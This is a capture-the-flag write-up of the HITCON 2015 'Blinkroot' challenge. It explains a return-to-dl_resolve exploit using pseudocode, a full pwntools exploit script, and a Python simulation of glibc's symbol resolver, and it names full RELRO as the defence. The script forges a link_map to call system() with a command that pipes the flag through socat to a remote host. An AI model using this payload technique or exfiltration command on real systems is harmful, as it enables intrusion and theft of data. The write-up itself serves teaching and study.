HITCON 2015 Quals Pwn Blinkroot Write-up

Introduction

This post is a write-up of Blinkroot from HITCON 2015 Quals, and uses the challenge to demonstrate the return-to-dl_resolve technique against glibc's lazy symbol binding.

Vulnerability Analysis

The decompiled main can be simplified to the following pseudocode:

char data[1024];

int main()
{
    /* the input must be exactly 1024 bytes */
    if (recvlen(0, data, 1024) == 1024) {
        close(0);
        close(1);
        close(1);
        /* one controlled write: the first qword of the input is an offset from data,
           the second qword is the value stored at that address */
        *(uint64_t *)(data + *(int64_t *)data) = *(uint64_t *)(data + 8);
        /* the rest of the input is passed to puts, so it already sits in memory as a C string */
        puts(data + 16);
    }
    exit(0);
}

The attacker is therefore able to write a chosen value at a chosen place in memory: the first 8 bytes of the input select the target (as an offset from data) and the next 8 bytes the value. Because the binary reaches the target through a “movaps” instruction, the chosen address must be 16-byte aligned.

Exploit Plan

Since this challenge closes stdin and stdout, a shell spawned by a one-gadget would have no way to talk to us, so overwriting a function pointer with a one-gadget address is useless. And since nothing is leaked, we cannot learn the base address of libc. Therefore we need to apply return-to-dl_resolve to hijack control flow into system with the argument string “cat flag | socat …”.
According to the write-up in [1], it seems that I picked the intended solution. That is probably because the intended solution is the shortest execution path in this challenge. More details will be given in my tutorial.

Exploit

from pwn import *

DEBUG = int(sys.argv[1])

if DEBUG == 0:
    r = remote("1.2.3.4", 233333)          # placeholder host/port
elif DEBUG == 1:
    r = process("./blinkroot")
elif DEBUG == 2:
    r = process("./blinkroot")
    gdb.attach(r, '''source ./script.py''')

def halt():
    while True:
        log.info(r.recvline())

def exploit():
    # data lives at 0x600bc0. The first qword is the write offset (-0x80 -> 0x600b40,
    # the GOT[1] slot that PLT0 pushes as the link_map), the second qword the value:
    # the address of the fake link_map built below at data + 0x140.
    payload = p64(0xffffffffffffff80) + p64(0x600d00)
    # data + 0x10 is what puts() receives; after the hijack it is system()'s argument.
    payload += b"cat flag | socat - TCP4:10.0.2.15:31337;\x00"
    payload = payload.ljust(0x140, b"\x00")

    # Fake struct link_map at 0x600d00. l_addr is chosen so that
    # l_addr + st_value == system, where st_value is read from an already
    # resolved GOT entry (see the fake Elf64_Sym below).
    fake_l_addr = 0x24870
    payload += p64(fake_l_addr)
    payload += p64(0x40) * 12                 # l_name .. l_info[DT_HASH]: filler
    payload += p64(0x600e00)                  # l_info[DT_STRTAB] -> Elf64_Dyn at 0x600e00
    payload += p64(0x600e08)                  # l_info[DT_SYMTAB] -> Elf64_Dyn at 0x600e08
    payload += p64(0x41) * 16                 # l_info[7..22]: filler
    payload += p64(0x600e10)                  # l_info[DT_JMPREL] -> Elf64_Dyn at 0x600e10
    # Overlapping Elf64_Dyn entries; only d_un.d_ptr (the second qword) matters.
    payload += p64(0x42)                      # 0x600e00: DT_STRTAB d_tag
    payload += p64(0x43)                      # 0x600e08: DT_STRTAB d_ptr (never used) / DT_SYMTAB d_tag
    payload += p64(0x600b78)                  # 0x600e10: DT_SYMTAB d_ptr = 0x600b78 / DT_JMPREL d_tag
    payload += p64(0x600e18)                  # 0x600e18: DT_JMPREL d_ptr = 0x600e18
    # Symbol 0 overlaps the GOT at 0x600b78: its st_other (byte 5) is the 0x7f of a
    # resolved libc pointer, so _dl_fixup skips the name lookup and uses
    # l_addr + st_value, with st_value = the libc pointer stored at 0x600b80.
    payload += p64(0x44) * 2                  # Elf64_Rela[0] at 0x600e18: filler
    # Elf64_Rela[1] at 0x600e30: puts is reloc index 1. r_info = 7 is
    # R_X86_64_JUMP_SLOT with symbol index 0; the resolved value is written
    # to l_addr + r_offset = 0x600b60 and then called.
    fake_reloc_roffset = 0x5dc2f0
    payload += p64(fake_reloc_roffset)
    payload += p64(7)

    # 0x3ff bytes plus sendline's newline are exactly the 1024 bytes the binary requires.
    payload = payload.ljust(0x3ff, b"\x00")
    r.sendline(payload)

exploit()
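To make the exploit plan and the payload above easier to follow, here is an added Python model of the glibc x86-64 _dl_fixup path that the payload drives; it is not part of the original write-up or of the challenge. It assumes the glibc link_map layout of that era (l_info at offset 0x40, 8-byte pointers, D_PTR reading d_un.d_ptr directly), the x86-64 convention that the PLT passes a relocation index into 24-byte Elf64_Rela entries, and constructed libc addresses in the GOT slots at 0x600b78 and 0x600b80. data is assumed to be at 0x600bc0, which is what the payload's own constants imply (fake link_map at data + 0x140 == 0x600d00). Only the non-default-visibility shortcut (st_other & 3 != 0) is modelled; the real symbol lookup is out of scope.

```python
import struct

# x86-64 ELF ABI constants and the glibc link_map field offset (assumed, not from the page)
R_X86_64_JUMP_SLOT = 7
DT_STRTAB, DT_SYMTAB, DT_JMPREL = 5, 6, 23
L_INFO_OFF = 0x40            # offsetof(struct link_map, l_info)
MASK64 = (1 << 64) - 1


class Memory:
    """Flat writable memory image starting at `base`; out-of-range access raises, like a fault."""
    def __init__(self, base, size):
        self.base, self.buf = base, bytearray(size)

    def read_u8(self, addr):
        return self.buf[addr - self.base]

    def read_u64(self, addr):
        return struct.unpack_from("<Q", self.buf, addr - self.base)[0]

    def write_u64(self, addr, value):
        struct.pack_into("<Q", self.buf, addr - self.base, value)

    def write(self, addr, data):
        off = addr - self.base
        self.buf[off:off + len(data)] = data


def dl_fixup(mem, link_map, reloc_index):
    """Model of _dl_fixup (elf/dl-runtime.c) restricted to the st_other != 0 path.
    Returns (value, rel_addr) and performs the GOT write elf_machine_fixup_plt would do."""
    l_addr = mem.read_u64(link_map)

    def d_ptr(tag):                           # D_PTR(l, l_info[tag]) -> l_info[tag]->d_un.d_ptr
        dyn = mem.read_u64(link_map + L_INFO_OFF + 8 * tag)
        return mem.read_u64(dyn + 8)

    symtab = d_ptr(DT_SYMTAB)
    jmprel = d_ptr(DT_JMPREL)
    reloc = jmprel + 24 * reloc_index         # sizeof(Elf64_Rela) == 24
    r_offset = mem.read_u64(reloc)
    r_info = mem.read_u64(reloc + 8)
    if r_info & 0xffffffff != R_X86_64_JUMP_SLOT:
        raise AssertionError("ELF_MACHINE_JMP_SLOT assertion in _dl_fixup")
    sym = symtab + 24 * (r_info >> 32)        # sizeof(Elf64_Sym) == 24
    if mem.read_u8(sym + 5) & 3 == 0:         # ELF64_ST_VISIBILITY(st_other) == STV_DEFAULT
        raise NotImplementedError("default visibility: real _dl_fixup would look the name up here")
    value = (l_addr + mem.read_u64(sym + 8)) & MASK64      # l_addr + sym->st_value
    rel_addr = (l_addr + r_offset) & MASK64                 # l_addr + reloc->r_offset
    mem.write_u64(rel_addr, value)                          # *rel_addr = value
    return value, rel_addr


def build_payload(cmd=b"echo hello\x00"):    # constructed command; the write-up uses its own string
    """The write-up's payload layout with its constants; the command string is a placeholder."""
    p64 = lambda v: struct.pack("<Q", v)
    payload = p64(0xffffffffffffff80) + p64(0x600d00) + cmd
    payload = payload.ljust(0x140, b"\x00")
    payload += p64(0x24870) + p64(0x40) * 12 + p64(0x600e00) + p64(0x600e08)
    payload += p64(0x41) * 16 + p64(0x600e10)
    payload += p64(0x42) + p64(0x43) + p64(0x600b78) + p64(0x600e18)
    payload += p64(0x44) * 2 + p64(0x5dc2f0) + p64(7)
    return payload.ljust(0x3ff, b"\x00")


def simulate(data_addr=0x600bc0, got1=0x600b40, libc_fn=0x7f1234567890, puts_index=1):
    """Run the binary's write primitive and then the resolver over the payload."""
    mem = Memory(0x600000, 0x1000)
    # constructed: two GOT entries already resolved by earlier calls (0x00007f... pointers)
    mem.write_u64(0x600b78, libc_fn + 0x100)
    mem.write_u64(0x600b80, libc_fn)
    payload = build_payload()
    mem.write(data_addr, payload)
    # the binary's primitive: *(uint64_t *)(data + *(int64_t *)data) = *(uint64_t *)(data + 8)
    off = struct.unpack("<q", payload[:8])[0]
    val = struct.unpack("<Q", payload[8:16])[0]
    mem.write_u64(data_addr + off, val)
    assert data_addr + off == got1            # the write lands on the GOT[1] link_map slot
    # puts@plt now pushes GOT[1] (our fake link_map) and its reloc index into _dl_runtime_resolve
    return dl_fixup(mem, mem.read_u64(got1), puts_index)


if __name__ == "__main__":
    value, rel_addr = simulate()
    print("resolved value 0x%x written to 0x%x" % (value, rel_addr))
```

Running it reproduces the exploit's arithmetic: the resolver never looks up a name, computes l_addr + GOT[0x600b80], stores that value at 0x600b60 and the PLT stub then jumps to it. The whole scheme rests on lazy binding through a writable .got.plt; a binary linked with full RELRO (-z relro -z now) binds every import at load time and maps .got.plt read-only, so this path never executes. readelf -l (a GNU_RELRO segment) and readelf -d (FLAGS BIND_NOW / FLAGS_1 NOW) show whether a given binary has that protection.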

Reference

[1] http://ddaa.tw/hitcon_pwn_200_blinkroot.html
